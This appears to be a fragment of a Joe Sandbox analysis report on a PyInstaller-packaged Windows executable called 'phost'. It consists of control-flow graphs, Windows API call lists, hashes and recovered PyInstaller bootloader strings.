MultiByteToWideChar _fread_nolock 10512->10516 10513 7ff62cc8ec08 _fread_nolock HeapAlloc 10513->10516 10514 7ff62cc896ea 10515 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10514->10515 10515->10511 10516->10511 10516->10512 10516->10513 10516->10514 10517 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10516->10517 10517->10516 10518 7ff62cc97d60 10519 7ff62cc97da3 10518->10519 10520 7ff62cc97d75 CreateFileW 10518->10520 10520->10519 10049 7ff62cc8f0e4 10054 7ff62cc8ed80 10049->10054 10052 7ff62cc8f11f 10053 7ff62cc8f139 InitializeCriticalSectionAndSpinCount 10053->10052 10055 7ff62cc8eddd 10054->10055 10061 7ff62cc8edd8 10054->10061 10055->10052 10055->10053 10056 7ff62cc8ee0d LoadLibraryExW 10058 7ff62cc8eee2 10056->10058 10059 7ff62cc8ee32 GetLastError 10056->10059 10057 7ff62cc8ef02 GetProcAddress 10057->10055 10058->10057 10060 7ff62cc8eef9 FreeLibrary 10058->10060 10059->10061 10060->10057 10061->10055 10061->10056 10061->10057 10062 7ff62cc8ee6c LoadLibraryExW 10061->10062 10062->10058 10062->10061 10063 7ff62cc918e4 10064 7ff62cc91924 _get_daylight 10063->10064 10067 7ff62cc9193c 10063->10067 10066 7ff62cc91929 _invalid_parameter_noinfo 10064->10066 10065 7ff62cc91b6c 10096 7ff62cc89024 10065->10096 10086 7ff62cc91bef 10066->10086 10067->10065 10076 7ff62cc91b15 10067->10076 10079 7ff62cc91a12 FindFirstFileExW 10067->10079 10088 7ff62cc91b44 10067->10088 10092 7ff62cc91abb FindNextFileW 10067->10092 10094 7ff62cc91afd FindClose 10067->10094 10095 7ff62cc91b3b FindClose 10067->10095 10068 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 10070 7ff62cc91ca3 10068->10070 10072 7ff62cc91bc4 10074 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10072->10074 10073 7ff62cc91c62 10078 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10073->10078 10077 7ff62cc91bcb 10074->10077 10075 7ff62cc91bf6 10075->10073 10091 7ff62cc91cbe 10075->10091 10102 7ff62cc917d0 10075->10102 10080 7ff62cc91b36 10076->10080 10083 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10076->10083 10077->10080 10084 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10077->10084 10081 7ff62cc91c71 10078->10081 10079->10067 10082 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10080->10082 10085 7ff62cc91c8a 10081->10085 10090 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10081->10090 10082->10086 10083->10076 10084->10077 10087 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10085->10087 10086->10068 10087->10086 10088->10080 10093 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10088->10093 10090->10081 10092->10067 10093->10088 10094->10067 10095->10088 10097 7ff62cc89074 10096->10097 10098 7ff62cc8903c 10096->10098 10097->10072 10097->10075 10098->10097 10099 7ff62cc8ec08 _fread_nolock HeapAlloc 10098->10099 10100 7ff62cc8906a 10099->10100 10101 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10100->10101 10101->10097 10105 7ff62cc917ed _get_daylight 10102->10105 10103 7ff62cc9180b 10103->10075 10104 7ff62cc91801 _invalid_parameter_noinfo 10104->10103 10105->10103 10105->10104 10521 7ff62cc91e64 10522 7ff62cc91e80 _fread_nolock _get_daylight 10521->10522 10523 7ff62cc91ead _fread_nolock _get_daylight 10522->10523 10524 7ff62cc91f1c _invalid_parameter_noinfo 10522->10524 10525 7ff62cc91fbd _invalid_parameter_noinfo 10523->10525 10526 7ff62cc91f5f 10523->10526 10524->10523 10525->10526 10527 7ff62cc91ff9 10526->10527 10528 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10526->10528 10528->10527 10106 7ff62cc8efd8 10107 7ff62cc8ed80 5 API calls 10106->10107 10108 7ff62cc8f016 10107->10108 10109 7ff62cc8f01e 10108->10109 10110 7ff62cc8f087 CompareStringW 10108->10110 10110->10109 9465 7ff62cc72fe0 9466 7ff62cc72ff0 9465->9466 9467 7ff62cc7302b 9466->9467 9468 7ff62cc73041 9466->9468 9469 7ff62cc72710 9 API calls 9467->9469 9470 7ff62cc73061 9468->9470 9479 7ff62cc73077 __std_exception_destroy 9468->9479 9482 7ff62cc73037 __std_exception_destroy 9469->9482 9471 7ff62cc72710 9 API calls 9470->9471 9471->9482 9472 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9473 7ff62cc731fa 9472->9473 9474 7ff62cc71470 56 API calls 9474->9479 9475 7ff62cc73349 9476 7ff62cc72710 9 API calls 9475->9476 9476->9482 9477 7ff62cc73333 9478 7ff62cc72710 9 API calls 9477->9478 9478->9482 9479->9474 9479->9475 9479->9477 9480 7ff62cc7330d 9479->9480 9479->9482 9481 7ff62cc72710 9 API calls 9480->9481 9481->9482 9482->9472 10529 7ff62cc7df60 10530 7ff62cc7dd38 __vcrt_FlsAlloc 5 API calls 10529->10530 10531 7ff62cc7df8e 10530->10531 10532 7ff62cc7df98 10531->10532 10533 7ff62cc7dfa0 TlsSetValue 10531->10533 10533->10532 10534 7ff62cc7fe60 GetCommandLineA GetCommandLineW 10111 7ff62cc97ddc WriteConsoleW 10112 7ff62cc97e83 10111->10112 10113 7ff62cc97e19 GetLastError 10111->10113 10113->10112 10114 7ff62cc97e24 10113->10114 10115 7ff62cc97e31 CloseHandle 10114->10115 10116 7ff62cc97e37 CreateFileW WriteConsoleW 10114->10116 10115->10116 10116->10112 10117 7ff62cc926dc 10126 7ff62cc92034 10117->10126 10120 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 10122 7ff62cc92980 10120->10122 10121 7ff62cc92746 IsValidCodePage 10123 7ff62cc92757 10121->10123 10125 7ff62cc92760 _fread_nolock 10121->10125 10124 7ff62cc92786 GetCPInfo 10123->10124 10123->10125 10124->10125 10125->10120 10127 7ff62cc92048 10126->10127 10128 7ff62cc92054 GetOEMCP 10127->10128 10129 7ff62cc92066 10127->10129 10130 7ff62cc9207b 10128->10130 10129->10130 10131 7ff62cc9206b GetACP 10129->10131 10130->10121 10130->10125 10131->10130 10535 7ff62cc9705c 10536 7ff62cc97096 10535->10536 10537 7ff62cc97069 10535->10537 10539 7ff62cc970da _get_daylight 10536->10539 10541 7ff62cc970f9 _get_daylight 10536->10541 10544 7ff62cc970ce _get_daylight 10536->10544 10537->10536 10538 7ff62cc9706e _get_daylight 10537->10538 10540 7ff62cc97073 _invalid_parameter_noinfo 10538->10540 10542 7ff62cc970df _invalid_parameter_noinfo 10539->10542 10543 7ff62cc97108 _invalid_parameter_noinfo 10541->10543 10541->10544 10542->10544 10543->10544

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff62cc71000-7ff62cc73806 call 7ff62cc7fe88 call 7ff62cc7fe90 call 7ff62cc7c8c0 call 7ff62cc85460 call 7ff62cc854f4 call 7ff62cc736b0 14 7ff62cc73808-7ff62cc7380f 0->14 15 7ff62cc73814-7ff62cc73836 call 7ff62cc71950 0->15 16 7ff62cc73c97-7ff62cc73cb2 call 7ff62cc7c5c0 14->16 21 7ff62cc7383c-7ff62cc73856 call 7ff62cc71c80 15->21 22 7ff62cc7391b-7ff62cc73931 call 7ff62cc745b0 15->22 26 7ff62cc7385b-7ff62cc7389b call 7ff62cc78a20 21->26 27 7ff62cc7396a-7ff62cc7397f call 7ff62cc72710 22->27 28 7ff62cc73933-7ff62cc73960 call 7ff62cc77f80 22->28 35 7ff62cc7389d-7ff62cc738a3 26->35 36 7ff62cc738c1-7ff62cc738cc call 7ff62cc84fa0 26->36 40 7ff62cc73c8f 27->40 38 7ff62cc73984-7ff62cc739a6 call 7ff62cc71c80 28->38 39 7ff62cc73962-7ff62cc73965 call 7ff62cc800bc 28->39 41 7ff62cc738a5-7ff62cc738ad 35->41 42 7ff62cc738af-7ff62cc738bd call 7ff62cc78b90 35->42 48 7ff62cc739fc-7ff62cc73a2a call 7ff62cc78b30 call 7ff62cc78b90 * 3 36->48 49 7ff62cc738d2-7ff62cc738e1 call 7ff62cc78a20 36->49 53 7ff62cc739b0-7ff62cc739b9 38->53 39->27 40->16 41->42 42->36 76 7ff62cc73a2f-7ff62cc73a3e call 7ff62cc78a20 48->76 57 7ff62cc738e7-7ff62cc738ed 49->57 58 7ff62cc739f4-7ff62cc739f7 call 7ff62cc84fa0 49->58 53->53 56 7ff62cc739bb-7ff62cc739d8 call 7ff62cc71950 53->56 56->26 65 7ff62cc739de-7ff62cc739ef call 7ff62cc72710 56->65 62 7ff62cc738f0-7ff62cc738fc 57->62 58->48 66 7ff62cc73905-7ff62cc73908 62->66 67 7ff62cc738fe-7ff62cc73903 62->67 65->40 66->58 70 7ff62cc7390e-7ff62cc73916 call 7ff62cc84fa0 66->70 67->62 67->66 70->76 79 7ff62cc73a44-7ff62cc73a47 76->79 80 7ff62cc73b45-7ff62cc73b53 76->80 79->80 81 7ff62cc73a4d-7ff62cc73a50 79->81 82 7ff62cc73b59-7ff62cc73b5d 80->82 83 7ff62cc73a67 80->83 84 7ff62cc73a56-7ff62cc73a5a 81->84 85 7ff62cc73b14-7ff62cc73b17 81->85 86 7ff62cc73a6b-7ff62cc73a90 call 7ff62cc84fa0 82->86 83->86 84->85 87 7ff62cc73a60 84->87 88 7ff62cc73b19-7ff62cc73b1d 85->88 89 7ff62cc73b2f-7ff62cc73b40 call 7ff62cc72710 85->89 95 7ff62cc73aab-7ff62cc73ac0 86->95 96 7ff62cc73a92-7ff62cc73aa6 call 7ff62cc78b30 86->96 87->83 88->89 91 7ff62cc73b1f-7ff62cc73b2a 88->91 97 7ff62cc73c7f-7ff62cc73c87 89->97 91->86 99 7ff62cc73be8-7ff62cc73bfa call 7ff62cc78a20 95->99 100 7ff62cc73ac6-7ff62cc73aca 95->100 96->95 97->40 108 7ff62cc73bfc-7ff62cc73c02 99->108 109 7ff62cc73c2e 99->109 102 7ff62cc73bcd-7ff62cc73be2 call 7ff62cc71940 100->102 103 7ff62cc73ad0-7ff62cc73ae8 call 7ff62cc852c0 100->103 102->99 102->100 114 7ff62cc73aea-7ff62cc73b02 call 7ff62cc852c0 103->114 115 7ff62cc73b62-7ff62cc73b7a call 7ff62cc852c0 103->115 112 7ff62cc73c04-7ff62cc73c1c 108->112 113 7ff62cc73c1e-7ff62cc73c2c 108->113 111 7ff62cc73c31-7ff62cc73c40 call 7ff62cc84fa0 109->111 123 7ff62cc73c46-7ff62cc73c4a 111->123 124 7ff62cc73d41-7ff62cc73d63 call 7ff62cc744d0 111->124 112->111 113->111 114->102 122 7ff62cc73b08-7ff62cc73b0f 114->122 125 7ff62cc73b7c-7ff62cc73b80 115->125 126 7ff62cc73b87-7ff62cc73b9f call 7ff62cc852c0 115->126 122->102 128 7ff62cc73cd4-7ff62cc73ce6 call 7ff62cc78a20 123->128 129 7ff62cc73c50-7ff62cc73c5f call 7ff62cc790e0 123->129 139 7ff62cc73d65-7ff62cc73d6f call 7ff62cc74620 124->139 140 7ff62cc73d71-7ff62cc73d82 call 7ff62cc71c80 124->140 125->126 135 7ff62cc73bac-7ff62cc73bc4 call 7ff62cc852c0 126->135 136 7ff62cc73ba1-7ff62cc73ba5 126->136 144 7ff62cc73ce8-7ff62cc73ceb 128->144 145 7ff62cc73d35-7ff62cc73d3c 128->145 142 7ff62cc73cb3-7ff62cc73cbd call 7ff62cc78850 129->142 143 7ff62cc73c61 129->143 135->102 155 7ff62cc73bc6 135->155 136->135 153 7ff62cc73d87-7ff62cc73d96 139->153 140->153 162 7ff62cc73cc8-7ff62cc73ccf 142->162 163 7ff62cc73cbf-7ff62cc73cc6 142->163 150 7ff62cc73c68 call 7ff62cc72710 143->150 144->145 151 7ff62cc73ced-7ff62cc73d10 call 7ff62cc71c80 144->151 145->150 164 7ff62cc73c6d-7ff62cc73c77 150->164 168 7ff62cc73d2b-7ff62cc73d33 call 7ff62cc84fa0 151->168 169 7ff62cc73d12-7ff62cc73d26 call 7ff62cc72710 call 7ff62cc84fa0 151->169 158 7ff62cc73d98-7ff62cc73d9f 153->158 159 7ff62cc73dc4-7ff62cc73dda call 7ff62cc79400 153->159 155->102 158->159 160 7ff62cc73da1-7ff62cc73da5 158->160 171 7ff62cc73ddc 159->171 172 7ff62cc73de8-7ff62cc73e04 SetDllDirectoryW 159->172 160->159 166 7ff62cc73da7-7ff62cc73dbe SetDllDirectoryW LoadLibraryExW 160->166 162->153 163->150 164->97 166->159 168->153 169->164 171->172 175 7ff62cc73e0a-7ff62cc73e19 call 7ff62cc78a20 172->175 176 7ff62cc73f01-7ff62cc73f08 172->176 189 7ff62cc73e1b-7ff62cc73e21 175->189 190 7ff62cc73e32-7ff62cc73e3c call 7ff62cc84fa0 175->190 179 7ff62cc73ffc-7ff62cc74004 176->179 180 7ff62cc73f0e-7ff62cc73f15 176->180 184 7ff62cc74029-7ff62cc74034 call 7ff62cc736a0 call 7ff62cc73360 179->184 185 7ff62cc74006-7ff62cc74023 PostMessageW GetMessageW 179->185 180->179 183 7ff62cc73f1b-7ff62cc73f25 call 7ff62cc733c0 180->183 183->164 197 7ff62cc73f2b-7ff62cc73f3f call 7ff62cc790c0 183->197 202 7ff62cc74039-7ff62cc7405b call 7ff62cc73670 call 7ff62cc76fb0 call 7ff62cc76d60 184->202 185->184 193 7ff62cc73e2d-7ff62cc73e2f 189->193 194 7ff62cc73e23-7ff62cc73e2b 189->194 199 7ff62cc73ef2-7ff62cc73efc call 7ff62cc78b30 190->199 200 7ff62cc73e42-7ff62cc73e48 190->200 193->190 194->193 209 7ff62cc73f64-7ff62cc73fa7 call 7ff62cc78b30 call 7ff62cc78bd0 call 7ff62cc76fb0 call 7ff62cc76d60 call 7ff62cc78ad0 197->209 210 7ff62cc73f41-7ff62cc73f5e PostMessageW GetMessageW 197->210 199->176 200->199 204 7ff62cc73e4e-7ff62cc73e54 200->204 207 7ff62cc73e56-7ff62cc73e58 204->207 208 7ff62cc73e5f-7ff62cc73e61 204->208 212 7ff62cc73e5a 207->212 213 7ff62cc73e67-7ff62cc73e83 call 7ff62cc76db0 call 7ff62cc77330 207->213 208->176 208->213 248 7ff62cc73fe9-7ff62cc73ff7 call 7ff62cc71900 209->248 249 7ff62cc73fa9-7ff62cc73fb3 call 7ff62cc79200 209->249 210->209 212->176 228 7ff62cc73e85-7ff62cc73e8c 213->228 229 7ff62cc73e8e-7ff62cc73e95 213->229 231 7ff62cc73edb-7ff62cc73ef0 call 7ff62cc72a50 call 7ff62cc76fb0 call 7ff62cc76d60 228->231 232 7ff62cc73e97-7ff62cc73ea4 call 7ff62cc76df0 229->232 233 7ff62cc73eaf-7ff62cc73eb9 call 7ff62cc771a0 229->233 231->176 232->233 242 7ff62cc73ea6-7ff62cc73ead 232->242 243 7ff62cc73ebb-7ff62cc73ec2 233->243 244 7ff62cc73ec4-7ff62cc73ed2 call 7ff62cc774e0 233->244 242->231 243->231 244->176 256 7ff62cc73ed4 244->256 248->164 249->248 259 7ff62cc73fb5-7ff62cc73fca 249->259 256->231 260 7ff62cc73fcc-7ff62cc73fdf call 7ff62cc72710 call 7ff62cc71900 259->260 261 7ff62cc73fe4 call 7ff62cc72a50 259->261 260->164 261->248
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                              • Instruction ID: d91159f3654b64ad46d2a51dc8f32fd18666e8e3e401ee22508fd9f32b87e453
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E32AE21F4C68291FF25DB29DD552B92279EF447A4F884032DA4DCB2C6EF2CE559E302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 465 7ff62cc969d4-7ff62cc96a47 call 7ff62cc96708 468 7ff62cc96a61-7ff62cc96a6b call 7ff62cc88590 465->468 469 7ff62cc96a49-7ff62cc96a52 call 7ff62cc84f58 465->469 475 7ff62cc96a86-7ff62cc96aef CreateFileW 468->475 476 7ff62cc96a6d-7ff62cc96a84 call 7ff62cc84f58 call 7ff62cc84f78 468->476 474 7ff62cc96a55-7ff62cc96a5c call 7ff62cc84f78 469->474 488 7ff62cc96da2-7ff62cc96dc2 474->488 479 7ff62cc96af1-7ff62cc96af7 475->479 480 7ff62cc96b6c-7ff62cc96b77 GetFileType 475->480 476->474 485 7ff62cc96b39-7ff62cc96b67 GetLastError call 7ff62cc84eec 479->485 486 7ff62cc96af9-7ff62cc96afd 479->486 482 7ff62cc96b79-7ff62cc96bb4 GetLastError call 7ff62cc84eec CloseHandle 480->482 483 7ff62cc96bca-7ff62cc96bd1 480->483 482->474 499 7ff62cc96bba-7ff62cc96bc5 call 7ff62cc84f78 482->499 491 7ff62cc96bd3-7ff62cc96bd7 483->491 492 7ff62cc96bd9-7ff62cc96bdc 483->492 485->474 486->485 493 7ff62cc96aff-7ff62cc96b37 CreateFileW 486->493 497 7ff62cc96be2-7ff62cc96c37 call 7ff62cc884a8 491->497 492->497 498 7ff62cc96bde 492->498 493->480 493->485 503 7ff62cc96c56-7ff62cc96c87 call 7ff62cc96488 497->503 504 7ff62cc96c39-7ff62cc96c45 call 7ff62cc96910 497->504 498->497 499->474 511 7ff62cc96c89-7ff62cc96c8b 503->511 512 7ff62cc96c8d-7ff62cc96ccf 503->512 504->503 510 7ff62cc96c47 504->510 513 7ff62cc96c49-7ff62cc96c51 call 7ff62cc8ab30 510->513 511->513 514 7ff62cc96cf1-7ff62cc96cfc 512->514 515 7ff62cc96cd1-7ff62cc96cd5 512->515 513->488 516 7ff62cc96da0 514->516 517 7ff62cc96d02-7ff62cc96d06 514->517 515->514 519 7ff62cc96cd7-7ff62cc96cec 515->519 516->488 517->516 520 7ff62cc96d0c-7ff62cc96d51 CloseHandle CreateFileW 517->520 519->514 522 7ff62cc96d53-7ff62cc96d81 GetLastError call 7ff62cc84eec call 7ff62cc886d0 520->522 523 7ff62cc96d86-7ff62cc96d9b 520->523 522->523 523->516
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction ID: 7df44e4102c86179fbd9d14821d3b9baefb01ab3e15938cec973a855de33fc49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46C1AF36B28A8186EF50DFA9C8906BD3771EB49BA8B019225DE2E977D4DF38D451C301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction ID: f948e57ca8638abdaf421297596fcdd9006840ea5b7e6967280019a7dc4aee91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F0493271864286FF708B64B8597766370EB88778F084235D96D45AD4DF3CD05DD601

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 267 7ff62cc71950-7ff62cc7198b call 7ff62cc745b0 270 7ff62cc71991-7ff62cc719d1 call 7ff62cc77f80 267->270 271 7ff62cc71c4e-7ff62cc71c72 call 7ff62cc7c5c0 267->271 276 7ff62cc71c3b-7ff62cc71c3e call 7ff62cc800bc 270->276 277 7ff62cc719d7-7ff62cc719e7 call 7ff62cc80744 270->277 281 7ff62cc71c43-7ff62cc71c4b 276->281 282 7ff62cc71a08-7ff62cc71a24 call 7ff62cc8040c 277->282 283 7ff62cc719e9-7ff62cc71a03 call 7ff62cc84f78 call 7ff62cc72910 277->283 281->271 289 7ff62cc71a26-7ff62cc71a40 call 7ff62cc84f78 call 7ff62cc72910 282->289 290 7ff62cc71a45-7ff62cc71a5a call 7ff62cc84f98 282->290 283->276 289->276 296 7ff62cc71a5c-7ff62cc71a76 call 7ff62cc84f78 call 7ff62cc72910 290->296 297 7ff62cc71a7b-7ff62cc71afc call 7ff62cc71c80 * 2 call 7ff62cc80744 290->297 296->276 309 7ff62cc71b01-7ff62cc71b14 call 7ff62cc84fb4 297->309 312 7ff62cc71b16-7ff62cc71b30 call 7ff62cc84f78 call 7ff62cc72910 309->312 313 7ff62cc71b35-7ff62cc71b4e call 7ff62cc8040c 309->313 312->276 319 7ff62cc71b50-7ff62cc71b6a call 7ff62cc84f78 call 7ff62cc72910 313->319 320 7ff62cc71b6f-7ff62cc71b8b call 7ff62cc80180 313->320 319->276 326 7ff62cc71b8d-7ff62cc71b99 call 7ff62cc72710 320->326 327 7ff62cc71b9e-7ff62cc71bac 320->327 326->276 327->276 330 7ff62cc71bb2-7ff62cc71bb9 327->330 333 7ff62cc71bc1-7ff62cc71bc7 330->333 334 7ff62cc71bc9-7ff62cc71bd6 333->334 335 7ff62cc71be0-7ff62cc71bef 333->335 336 7ff62cc71bf1-7ff62cc71bfa 334->336 335->335 335->336 337 7ff62cc71bfc-7ff62cc71bff 336->337 338 7ff62cc71c0f 336->338 337->338 339 7ff62cc71c01-7ff62cc71c04 337->339 340 7ff62cc71c11-7ff62cc71c24 338->340 339->338 341 7ff62cc71c06-7ff62cc71c09 339->341 342 7ff62cc71c2d-7ff62cc71c39 340->342 343 7ff62cc71c26 340->343 341->338 344 7ff62cc71c0b-7ff62cc71c0d 341->344 342->276 342->333 343->342 344->340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC77F80: _fread_nolock.LIBCMT ref: 00007FF62CC7802A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF62CC71A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
                                                                                                                                                                                                                              • Instruction ID: c2a2261a0094ef8775b33c91a0820f30aa242f53cdaacb0095c9c6d03841031e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B81D071F0868295EF60CB28DC506BA63B4EF487A4F448135E98DCB789DE3CE1899742

